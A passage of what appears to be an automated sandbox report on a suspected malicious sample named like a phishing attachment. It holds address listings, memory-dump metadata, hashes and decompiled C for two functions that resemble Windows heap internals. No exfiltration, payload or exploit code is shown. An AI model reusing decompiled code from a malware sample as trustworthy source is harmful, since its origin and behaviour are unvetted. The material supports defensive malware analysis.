                                                                                                                                                                                  0x3334c5bb
                                                                                                                                                                                  0x3334c5c9
                                                                                                                                                                                  0x3334c5c9
                                                                                                                                                                                  0x3334c58c
                                                                                                                                                                                  0x3334c58e
                                                                                                                                                                                  0x3334c597
                                                                                                                                                                                  0x333a9fd6
                                                                                                                                                                                  0x333a9fdb
                                                                                                                                                                                  0x333a9fdb
                                                                                                                                                                                  0x3334c5a1
                                                                                                                                                                                  0x3334c5a2
                                                                                                                                                                                  0x3334c5a5
                                                                                                                                                                                  0x3334c5a7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334c58e
                                                                                                                                                                                  0x3334c52b
                                                                                                                                                                                  0x3334c52d
                                                                                                                                                                                  0x3334c52f
                                                                                                                                                                                  0x3334c52f
                                                                                                                                                                                  0x3334c532
                                                                                                                                                                                  0x3334c534
                                                                                                                                                                                  0x3334c53a
                                                                                                                                                                                  0x3334c53e
                                                                                                                                                                                  0x3334c548
                                                                                                                                                                                  0x3334c54a
                                                                                                                                                                                  0x3334c555
                                                                                                                                                                                  0x3334c557
                                                                                                                                                                                  0x3334c557
                                                                                                                                                                                  0x3334c564
                                                                                                                                                                                  0x3334c566
                                                                                                                                                                                  0x333a9f99
                                                                                                                                                                                  0x333a9fa4
                                                                                                                                                                                  0x333a9fb7
                                                                                                                                                                                  0x333a9fc6
                                                                                                                                                                                  0x333a9fca
                                                                                                                                                                                  0x333a9fca
                                                                                                                                                                                  0x333a9fa4
                                                                                                                                                                                  0x3334c566
                                                                                                                                                                                  0x3334c578
                                                                                                                                                                                  0x3334c579
                                                                                                                                                                                  0x3334c57c
                                                                                                                                                                                  0x3334c57e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334c4fd
                                                                                                                                                                                  0x3334c4fd
                                                                                                                                                                                  0x3334c4ff
                                                                                                                                                                                  0x3334c501
                                                                                                                                                                                  0x3334c50d
                                                                                                                                                                                  0x333a9f24
                                                                                                                                                                                  0x333a9f29
                                                                                                                                                                                  0x333a9f2c
                                                                                                                                                                                  0x333a9f2f
                                                                                                                                                                                  0x333a9f35
                                                                                                                                                                                  0x333a9f3f
                                                                                                                                                                                  0x333a9f41
                                                                                                                                                                                  0x333a9f41
                                                                                                                                                                                  0x333a9f4e
                                                                                                                                                                                  0x333a9f50
                                                                                                                                                                                  0x333a9f83
                                                                                                                                                                                  0x333a9f8d
                                                                                                                                                                                  0x333a9f91
                                                                                                                                                                                  0x333a9f91
                                                                                                                                                                                  0x333a9f50
                                                                                                                                                                                  0x3334c517
                                                                                                                                                                                  0x3334c518
                                                                                                                                                                                  0x3334c51b
                                                                                                                                                                                  0x3334c51d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334c501
                                                                                                                                                                                  0x3334c470
                                                                                                                                                                                  0x3334c470
                                                                                                                                                                                  0x3334c477
                                                                                                                                                                                  0x3334c47a
                                                                                                                                                                                  0x3334c47a
                                                                                                                                                                                  0x3334c482
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334c48a
                                                                                                                                                                                  0x3334c48d
                                                                                                                                                                                  0x3334c498
                                                                                                                                                                                  0x3334c4b4
                                                                                                                                                                                  0x3334c4c5
                                                                                                                                                                                  0x333a9f08
                                                                                                                                                                                  0x333a9f17
                                                                                                                                                                                  0x3334c4cb
                                                                                                                                                                                  0x3334c4cb
                                                                                                                                                                                  0x3334c4cb
                                                                                                                                                                                  0x3334c4c5
                                                                                                                                                                                  0x3334c4d5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334c4d5
                                                                                                                                                                                  0x3334c46e
                                                                                                                                                                                  0x3334c45b

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8070fc7d9b4d1b1e7dab6b291b2db00247e621764c6a0de89c6b775d0f7c6f34
                                                                                                                                                                                  • Instruction ID: ddb77abd9eab417cbe6e7fc839d910163d78aa7597f97dfcb52e5000422ccfe9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8070fc7d9b4d1b1e7dab6b291b2db00247e621764c6a0de89c6b775d0f7c6f34
                                                                                                                                                                                  • Instruction Fuzzy Hash: 46B17E74E002599AEB64CF69C890BADB3F5EF44740F04C5EAD54AEB650EB309DC5CB20
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333900A5 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                  			E333900A5(intOrPtr* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v44;
				char _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				signed int _v68;
				signed int _v72;
				signed char _v76;
				char _v80;
				intOrPtr* _v84;
				intOrPtr* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t107;
				signed int _t118;
				signed int _t127;
				signed int _t130;
				intOrPtr _t141;
				intOrPtr _t147;
				signed int _t156;
				signed int _t157;
				signed char _t160;
				signed int _t164;
				signed int _t166;
				signed int _t180;
				unsigned int _t189;
				unsigned int _t190;
				unsigned int _t191;
				intOrPtr* _t201;
				signed int _t202;
				signed int _t205;
				signed int _t206;

				_v8 =  *0x3344b370 ^ _t206;
				_t201 = _a8;
				_v84 = __edx;
				_t197 = 0;
				_v88 = _a4;
				_v60 = 0;
				_v72 = 0;
				_v68 = 0;
				if( *_t201 < 0xb0) {
					L31:
					_push(0x57);
					L32:
					_pop(_t101);
					L30:
					return E33394B50(_t101, _t160, _v8 ^ _t206, _t197, _t201, _t202);
				}
				_t160 =  *(_t201 + 0x40);
				 *((intOrPtr*)(_t201 + 0x94)) = _t201 + 0xb0;
				 *((intOrPtr*)(_t201 + 0x84)) = ( *(_t201 + 0x92) & 0x0000ffff) + 0xb0 + _t201;
				_push("true");
				_pop(_t202);
				_t164 = _t160 & 0x0000040b;
				if(_t164 == 0) {
					_t160 = _t160 | _t202;
					 *(_t201 + 0x40) = _t160;
					L4:
					if((_t160 & 0x02000000) != 0) {
						goto L31;
					}
					_t166 = _t160 & 0x00000400;
					if(_t166 != 0) {
						__eflags =  *((intOrPtr*)(_t201 + 0x80)) - _t197;
						if( *((intOrPtr*)(_t201 + 0x80)) != _t197) {
							goto L31;
						}
						__eflags =  *((intOrPtr*)(_t201 + 0x44)) - _t197;
						if( *((intOrPtr*)(_t201 + 0x44)) != _t197) {
							goto L31;
						}
						__eflags =  *(_t201 + 0x4c) - _t197;
						if( *(_t201 + 0x4c) != _t197) {
							goto L31;
						}
					}
					_t107 =  *(_t201 + 0x4c);
					if(_t107 != 0) {
						__eflags =  *((intOrPtr*)(_t201 + 0x44)) - _t197;
						if( *((intOrPtr*)(_t201 + 0x44)) != _t197) {
							goto L31;
						}
						__eflags = _t107;
						if(_t107 < 0) {
							goto L31;
						}
					}
					if((_t160 & 0x00000006) == 6) {
						goto L31;
					}
					_t197 = 0xc000;
					if((_t160 & 0x0000c000) == 0xc000) {
						goto L31;
					}
					if((_t160 & 0x04000000) != 0) {
						__eflags = _t160 & 0x00000026;
						if((_t160 & 0x00000026) != 0) {
							goto L31;
						}
						__eflags = _t166;
						if(_t166 != 0) {
							goto L31;
						}
					}
					_t197 =  &_v60;
					if(E33391B63(_t201 + 0x90,  &_v60) == 0) {
						asm("lock dec dword [eax+ecx*8+0x4]");
						_t101 = 0xb7;
						goto L30;
					}
					_t197 =  &_v76;
					if(E33391AA0(_t201,  &_v76) != 0) {
						goto L30;
					}
					if(( *(_t201 + 0x40) & 0x00010000) != 0) {
						_t118 = ( *(_t201 + 0x92) & 0x0000ffff) + 0x000000b7 + ( *(_t201 + 0x82) & 0x0000ffff) & 0xfffffff8;
						_v68 =  *_t201 - _t118;
						_t205 = _t201 + _t118;
						_v72 = _t205;
						_t202 = _t205 | 0xffffffff;
					} else {
						if(( *(_t201 + 0x40) & 0x10000000) == 0) {
							_t202 =  *( *[fs:0x30] + 0x64);
						}
					}
					_t160 = _v76;
					_t197 = _t160;
					_v56 = _t160;
					_t202 = E33391763(_t201, _t160, _t202, _v72, _v68);
					_v60 = _t202;
					if(_t202 == 0) {
						asm("lock dec dword [eax+ebx*8+0x4]");
						_push(8);
						goto L32;
					} else {
						_push(0);
						_push(0x2c);
						_push( &_v52);
						_push(0);
						if(E33392D10() < 0) {
							_t101 = E3337ABA0(_t122);
							goto L30;
						}
						 *(_t202 + 0x8c) =  *(_t202 + 0x8c) - 0x00000001 + _v44 &  !(_v44 - 1);
						if(( *(_t202 + 0xd4) & 0x04000000) != 0) {
							_t127 = E334232C9(_t202);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L18;
							}
							_t160 = E3337ABA0(_t127);
							__eflags = _t160;
							if(_t160 == 0) {
								goto L18;
							}
							L50:
							__eflags =  *(_t201 + 0x58);
							if( *(_t201 + 0x58) != 0) {
								_push( *(_t201 + 0x58));
								E33392A80();
								 *(_t201 + 0x58) =  *(_t201 + 0x58) & 0x00000000;
								_t89 = _t202 + 0x68;
								 *_t89 =  *(_t202 + 0x68) & 0x00000000;
								__eflags =  *_t89;
							}
							E3338E363(_t202, _t197);
							L29:
							_t101 = _t160;
							goto L30;
						}
						L18:
						_t128 =  *(_t202 + 0xd4);
						if(( *(_t202 + 0xd4) & 0x00000400) != 0) {
							L20:
							_t130 =  *(_t202 + 0x8c) + 0xffffffb8;
							if(_t130 >= 0xffff) {
								_t130 = 0xffff;
							}
							 *(_t202 + 0x90) = _t130 & 0xfffffff8;
							_t160 = E33390655(_t202);
							if(_t160 != 0) {
								goto L50;
							} else {
								if(( *(_t202 + 0xd4) & 0x00020000) == 0) {
									_t197 =  &_v80;
									_t160 = E33421A9E( *((intOrPtr*)(_t202 + 0x14)),  &_v80,  &_v64);
									__eflags = _t160;
									if(_t160 != 0) {
										goto L50;
									}
									 *((intOrPtr*)(_t202 + 0x17c)) = _v80;
								}
								_t180 = _v56;
								asm("lock inc dword [eax+ecx*8+0x4]");
								if(( *(_t202 + 0xd4) & 0x00000400) != 0) {
									L26:
									E333903FA(_t201, _t202,  &_v64);
									_t141 =  *0x334441d4; // 0x0
									 *(_t141 + _v56 * 8) = _t202;
									_push(0);
									_t197 = 5;
									E33390344(_t202, _t197, _t230);
									L27:
									asm("lock dec dword [eax+ecx*8+0x4]");
									if(_t160 != 0) {
										goto L50;
									}
									 *_v84 =  *_t201;
									 *_v88 =  *_t201;
									goto L29;
								}
								_t147 = E333904D0(_t180, E333922A0, _t202);
								_t230 = _t147;
								if(_t147 == 0) {
									_t202 = _v60;
									_t160 =  *( *[fs:0x18] + 0x34);
									goto L27;
								}
								 *((intOrPtr*)(_t202 + 0x1c)) = _t147;
								goto L26;
							}
						}
						_t197 = _v72;
						if(E3339088E(_t202, _v72, _v68, _t128 >> 0x00000002 & 1) != 0) {
							_t160 = E3337ABA0(_t152);
							__eflags = _t160;
							if(_t160 != 0) {
								goto L50;
							}
						}
						goto L20;
					}
				}
				_t189 =  !_t164;
				_t156 = _t189 & 0x000000ff;
				_t190 = _t189 >> 8;
				_t157 = _t190 & 0x000000ff;
				_t191 = _t190 >> 8;
				_v56 = _t191;
				_t197 =  *((intOrPtr*)(_t156 + 0x3332b330)) +  *((intOrPtr*)(_t157 + 0x3332b330));
				if( *((intOrPtr*)((_t191 >> 8) + 0x3332b330)) +  *((intOrPtr*)((_v56 & 0x000000ff) + 0x3332b330)) +  *((intOrPtr*)(_t156 + 0x3332b330)) +  *((intOrPtr*)(_t157 + 0x3332b330)) != 1) {
					goto L31;
				}
				_t197 = 0;
				goto L4;
			}





































                                                                                                                                                                                  0x333900b4
                                                                                                                                                                                  0x333900bd
                                                                                                                                                                                  0x333900c0
                                                                                                                                                                                  0x333900c3
                                                                                                                                                                                  0x333900c5
                                                                                                                                                                                  0x333900c8
                                                                                                                                                                                  0x333900d1
                                                                                                                                                                                  0x333900d4
                                                                                                                                                                                  0x333900d7
                                                                                                                                                                                  0x3339033f
                                                                                                                                                                                  0x3339033f
                                                                                                                                                                                  0x33390341
                                                                                                                                                                                  0x33390341
                                                                                                                                                                                  0x3339032e
                                                                                                                                                                                  0x3339033c
                                                                                                                                                                                  0x3339033c
                                                                                                                                                                                  0x333900dd
                                                                                                                                                                                  0x333900e6
                                                                                                                                                                                  0x333900fc
                                                                                                                                                                                  0x33390102
                                                                                                                                                                                  0x33390104
                                                                                                                                                                                  0x33390105
                                                                                                                                                                                  0x3339010b
                                                                                                                                                                                  0x333c93fb
                                                                                                                                                                                  0x333c93fd
                                                                                                                                                                                  0x33390150
                                                                                                                                                                                  0x33390156
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3339015e
                                                                                                                                                                                  0x33390164
                                                                                                                                                                                  0x333c9405
                                                                                                                                                                                  0x333c940c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9412
                                                                                                                                                                                  0x333c9415
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c941b
                                                                                                                                                                                  0x333c941e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9424
                                                                                                                                                                                  0x3339016a
                                                                                                                                                                                  0x3339016f
                                                                                                                                                                                  0x333c9429
                                                                                                                                                                                  0x333c942c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9432
                                                                                                                                                                                  0x333c9434
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c943a
                                                                                                                                                                                  0x3339017c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33390182
                                                                                                                                                                                  0x3339018d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33390199
                                                                                                                                                                                  0x333c943f
                                                                                                                                                                                  0x333c9442
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9448
                                                                                                                                                                                  0x333c944a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9450
                                                                                                                                                                                  0x333901a5
                                                                                                                                                                                  0x333901af
                                                                                                                                                                                  0x333c9460
                                                                                                                                                                                  0x333c9465
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9465
                                                                                                                                                                                  0x333901b5
                                                                                                                                                                                  0x333901c1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333901ce
                                                                                                                                                                                  0x333c9486
                                                                                                                                                                                  0x333c948b
                                                                                                                                                                                  0x333c948e
                                                                                                                                                                                  0x333c9491
                                                                                                                                                                                  0x333c9494
                                                                                                                                                                                  0x333901d4
                                                                                                                                                                                  0x333901db
                                                                                                                                                                                  0x333901e3
                                                                                                                                                                                  0x333901e3
                                                                                                                                                                                  0x333901db
                                                                                                                                                                                  0x333901e9
                                                                                                                                                                                  0x333901f1
                                                                                                                                                                                  0x333901f3
                                                                                                                                                                                  0x333901fc
                                                                                                                                                                                  0x333901fe
                                                                                                                                                                                  0x33390203
                                                                                                                                                                                  0x333c94a1
                                                                                                                                                                                  0x333c94a6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33390209
                                                                                                                                                                                  0x33390209
                                                                                                                                                                                  0x3339020b
                                                                                                                                                                                  0x33390210
                                                                                                                                                                                  0x33390211
                                                                                                                                                                                  0x3339021a
                                                                                                                                                                                  0x333c94ae
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c94ae
                                                                                                                                                                                  0x33390231
                                                                                                                                                                                  0x33390241
                                                                                                                                                                                  0x333c94ba
                                                                                                                                                                                  0x333c94bf
                                                                                                                                                                                  0x333c94c1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c94cd
                                                                                                                                                                                  0x333c94cf
                                                                                                                                                                                  0x333c94d1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c94d7
                                                                                                                                                                                  0x333c94d7
                                                                                                                                                                                  0x333c94db
                                                                                                                                                                                  0x333c94dd
                                                                                                                                                                                  0x333c94e0
                                                                                                                                                                                  0x333c94e5
                                                                                                                                                                                  0x333c94e9
                                                                                                                                                                                  0x333c94e9
                                                                                                                                                                                  0x333c94e9
                                                                                                                                                                                  0x333c94e9
                                                                                                                                                                                  0x333c94ef
                                                                                                                                                                                  0x3339032c
                                                                                                                                                                                  0x3339032c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3339032c
                                                                                                                                                                                  0x33390247
                                                                                                                                                                                  0x33390247
                                                                                                                                                                                  0x33390252
                                                                                                                                                                                  0x33390272
                                                                                                                                                                                  0x3339027d
                                                                                                                                                                                  0x33390282
                                                                                                                                                                                  0x333c950a
                                                                                                                                                                                  0x333c950a
                                                                                                                                                                                  0x3339028d
                                                                                                                                                                                  0x33390298
                                                                                                                                                                                  0x3339029c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333902a2
                                                                                                                                                                                  0x333902ac
                                                                                                                                                                                  0x333c9519
                                                                                                                                                                                  0x333c9521
                                                                                                                                                                                  0x333c9523
                                                                                                                                                                                  0x333c9525
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c952a
                                                                                                                                                                                  0x333c952a
                                                                                                                                                                                  0x333902b7
                                                                                                                                                                                  0x333902ba
                                                                                                                                                                                  0x333902c9
                                                                                                                                                                                  0x333902e1
                                                                                                                                                                                  0x333902e9
                                                                                                                                                                                  0x333902ee
                                                                                                                                                                                  0x333902fb
                                                                                                                                                                                  0x333902fd
                                                                                                                                                                                  0x33390301
                                                                                                                                                                                  0x33390304
                                                                                                                                                                                  0x33390309
                                                                                                                                                                                  0x33390311
                                                                                                                                                                                  0x33390318
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33390323
                                                                                                                                                                                  0x3339032a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3339032a
                                                                                                                                                                                  0x333902d1
                                                                                                                                                                                  0x333902d6
                                                                                                                                                                                  0x333902d8
                                                                                                                                                                                  0x333c953b
                                                                                                                                                                                  0x333c953e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c953e
                                                                                                                                                                                  0x333902de
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333902de
                                                                                                                                                                                  0x3339029c
                                                                                                                                                                                  0x33390254
                                                                                                                                                                                  0x3339026c
                                                                                                                                                                                  0x333c94ff
                                                                                                                                                                                  0x333c9501
                                                                                                                                                                                  0x333c9503
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9505
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3339026c
                                                                                                                                                                                  0x33390203
                                                                                                                                                                                  0x33390111
                                                                                                                                                                                  0x33390113
                                                                                                                                                                                  0x33390116
                                                                                                                                                                                  0x3339011f
                                                                                                                                                                                  0x33390122
                                                                                                                                                                                  0x33390125
                                                                                                                                                                                  0x3339012b
                                                                                                                                                                                  0x33390148
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3339014e
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b170a6b6156e9e70e8aa550ed41fab2368cfcf93c4634c00dce0c28bf13a83e6
                                                                                                                                                                                  • Instruction ID: a43f5b96682addc2991ee3876798d1323b8b2ab80d910adcfeef9fffa559d32f
                                                                                                                                                                                  • Opcode Fuzzy Hash: b170a6b6156e9e70e8aa550ed41fab2368cfcf93c4634c00dce0c28bf13a83e6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 68A18AB9A01706DFF714CF65C9C0BEAB7A9FF48354F458029E945EB281DB38A841CB90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33424080 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                                  			E33424080(signed int __ecx, void* __edx) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				char _v53;
				intOrPtr _v56;
				char _v57;
				signed int* _v60;
				char _v61;
				intOrPtr _v100;
				void* _t107;
				intOrPtr* _t109;
				intOrPtr _t121;
				intOrPtr _t125;
				signed int* _t131;
				intOrPtr _t138;
				intOrPtr _t142;
				intOrPtr _t147;
				signed int _t153;
				signed int _t156;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t160;
				intOrPtr _t161;
				signed int* _t167;
				signed int* _t168;
				intOrPtr _t170;
				signed int* _t174;
				intOrPtr _t176;
				signed int _t183;
				signed int _t189;
				signed int* _t190;
				intOrPtr _t191;
				unsigned int _t193;
				intOrPtr _t201;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t207;
				signed int _t210;
				signed int* _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				intOrPtr* _t222;
				void* _t224;
				intOrPtr* _t225;
				intOrPtr _t226;
				intOrPtr _t230;
				unsigned int _t231;
				intOrPtr _t234;
				signed int _t238;
				signed int _t242;
				intOrPtr _t243;

				_t198 = __ecx;
				_v8 = _v8 | 0xffffffff;
				_v12 = 0xfff0bdc0;
				L33362330(_t107, 0x33446884);
				_t109 =  *0x33443420; // 0x2fe08a8
				while(_t109 != 0x33443420) {
					_t222 = _t109;
					_v16 =  *_t109;
					_v28 = _t222 - 8;
					L333553C0(_t222 - 8);
					if( *((char*)(_t222 - 3)) == 0) {
						_v20 = _t222 - 0xbc;
						L33362330(_t222 - 0xbc, _t222 - 0xbc);
						_v44 = _v44 & 0x00000000;
						_push(4);
						_push( &_v44);
						_push(0xc);
						_push( *((intOrPtr*)(_t222 - 0xc4)));
						_v53 = 1;
						if(E333943A0() < 0) {
							L39:
							E333624D0(_v20);
							_push(_v32);
							goto L40;
						} else {
							_t234 = _v40;
							if(_t234 == 0) {
								goto L39;
							} else {
								_t189 = 0;
								_t238 = (_t234 + _t234 ^  *(_t222 + 0x24)) & 0x00000ffe ^  *(_t222 + 0x24);
								 *(_t222 + 0x24) = _t238;
								_t198 = _t238 >> 0x0000000b & 0x00000ffe;
								if((_t238 >> 0x0000000b & 0x00000ffe) < (_t238 & 0x00000ffe)) {
									while(_t189 != 0x102) {
										_t183 = L333621D0(_t222 + 0x2c, _t222 - 0xbc,  &_v12, 0);
										_t238 =  *(_t222 + 0x24);
										_t189 = _t183;
										_t198 = _t238 & 0x00000ffe;
										if((_t238 >> 0x0000000b & 0x00000ffe) < (_t238 & 0x00000ffe)) {
											continue;
										}
										goto L8;
									}
								}
								L8:
								if((_t238 & 0x007ff000) != 0) {
									_t121 =  *0x33446644; // 0x0
									_t125 = L33365D90(_t198,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t121 + 0x000c0000 | 0x00000008, (_t238 >> 0x0000000c & 0x000007ff) << 2);
									_v56 = _t125;
									_t190 = _t222 + 0x30;
									if(_t125 != 0) {
										_t201 =  *0x33446644; // 0x0
										_t198 = _t201 + 0x000c0000 | 0x00000008;
										_t131 = L33365D90(_t201 + 0x000c0000 | 0x00000008,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t201 + 0x000c0000 | 0x00000008, ( *(_t222 + 0x24) >> 0x0000000c & 0x000007ff) << 2);
										_v60 = _t131;
										if(_t131 != 0) {
											_t242 = 0;
											_t214 = _t131;
											_v32 = _v44 - _t131;
											while(1) {
												_t198 =  *_t190;
												if(_t198 == _t190) {
													break;
												}
												 *((intOrPtr*)(_t214 + _v32)) =  *((intOrPtr*)(_t198 + 8));
												_t190 = _t222 + 0x30;
												 *_t214 = _t198;
												_t158 =  *_t198;
												_v36 = _t158;
												if( *((intOrPtr*)(_t158 + 4)) != _t198) {
													goto L44;
												} else {
													_t167 =  *(_t198 + 4);
													if( *_t167 != _t198) {
														goto L44;
													} else {
														_t210 = _v36;
														_t242 = _t242 + 1;
														 *_t167 = _t210;
														_t214 =  &(_t214[1]);
														 *(_t210 + 4) = _t167;
														continue;
													}
												}
												goto L58;
											}
											 *(_t222 + 0x24) =  *(_t222 + 0x24) & 0xff800001;
											E333624D0(_t222 - 0xbc);
											E333552F0(_t198, _t222 - 8);
											_v44 = _v44 & 0x00000000;
											_t191 = _v52;
											_t224 = 0;
											_v57 = 0;
											_v32 = _t242 >> 6;
											while(_t224 < _t242) {
												_t67 = _t224 + 0x40; // 0x40
												if(_t67 > _t242) {
													_t153 = _t242 & 0x0000003f;
												} else {
													_t153 = 0x40;
												}
												_t198 =  &_v12;
												_push( &_v12);
												_push(0);
												_push(0);
												_push(_t191);
												_push(_t153);
												if(E33392F60() != 0x102) {
													_t224 = _t224 + 0x40;
													_t156 = _v36 + 1;
													_t191 = _t191 + 0x100;
													_v36 = _t156;
													if(_t156 <= _v24) {
														continue;
													}
												}
												break;
											}
											if(_t242 != 0) {
												_t225 = _v48;
												_t193 = _v32;
												do {
													_push( *((intOrPtr*)(_t225 + _t193)));
													E33392A80();
													_t147 =  *0x33446644; // 0x0
													E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t147 + 0xc0000,  *_t225);
													_t225 = _t225 + 4;
													_t242 = _t242 - 1;
												} while (_t242 != 0);
											}
											_t138 =  *0x33446644; // 0x0
											E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t138 + 0xc0000, _v48);
											goto L38;
										} else {
											while(1) {
												_t242 =  *_t190;
												if(_t242 == _t190) {
													break;
												}
												_t198 =  *_t242;
												if( *(_t198 + 4) != _t242) {
													goto L44;
												} else {
													_t168 =  *(_t242 + 4);
													if( *_t168 != _t242) {
														goto L44;
													} else {
														 *_t168 = _t198;
														 *(_t198 + 4) = _t168;
														_push( *((intOrPtr*)(_t242 + 8)));
														E33392A80();
														_t170 =  *0x33446644; // 0x0
														E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t170 + 0xc0000, _t242);
														continue;
													}
												}
												goto L58;
											}
											 *(_t222 + 0x24) =  *(_t222 + 0x24) & 0xff800001;
											L38:
											_t142 =  *0x33446644; // 0x0
											E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t142 + 0xc0000, _v44);
											if(_v61 != 0) {
												goto L39;
											}
											goto L41;
										}
									} else {
										while(1) {
											_t242 =  *_t190;
											if(_t242 == _t190) {
												break;
											}
											_t198 =  *_t242;
											if( *(_t198 + 4) != _t242) {
												L44:
												_t205 = 3;
												asm("int 0x29");
												_t159 = _t205;
												_v100 = _t159;
												_push(_t222);
												if(_t159 == 0) {
													L47:
													_t226 =  *0x7ffe03c0;
													_v20 = _t226;
												} else {
													_t226 =  *((intOrPtr*)(_t159 + 0x110));
													_v20 = _t226;
													if(_t226 == 0) {
														goto L47;
													}
												}
												_t206 =  *((intOrPtr*)(_t159 + 0x100));
												if(_t226 != _t206) {
													 *((intOrPtr*)(_t159 + 0x100)) = _t226;
													_t216 = _t226 - _t206;
													_v16 = _t216;
													if(_t216 != 0) {
														_t160 = _t159 + 8;
														_v24 = _t160;
														_push(_t190);
														_push(_t242);
														_t207 =  *_t160;
														_t161 =  *((intOrPtr*)(_t160 + 4));
														_v12 = _t161;
														do {
															_t217 = _t161;
															_t243 = _t207;
															_v28 = _t217;
															asm("lock cmpxchg8b [edi]");
															_t207 = _t243;
															_t161 = _t217;
															_v12 = _t161;
														} while (_t207 != _t243 || _t161 != _v28);
														_t230 = _v20;
														if(_t230 < 4) {
															_t231 = 4;
														} else {
															_t231 = _t230 + 1;
														}
														_t244 = _v36;
														_push(4);
														_push( &_v32);
														_push(8);
														_t105 = _t244 + 0x24; // 0x408bf455
														_push( *_t105);
														_v32 = _t231;
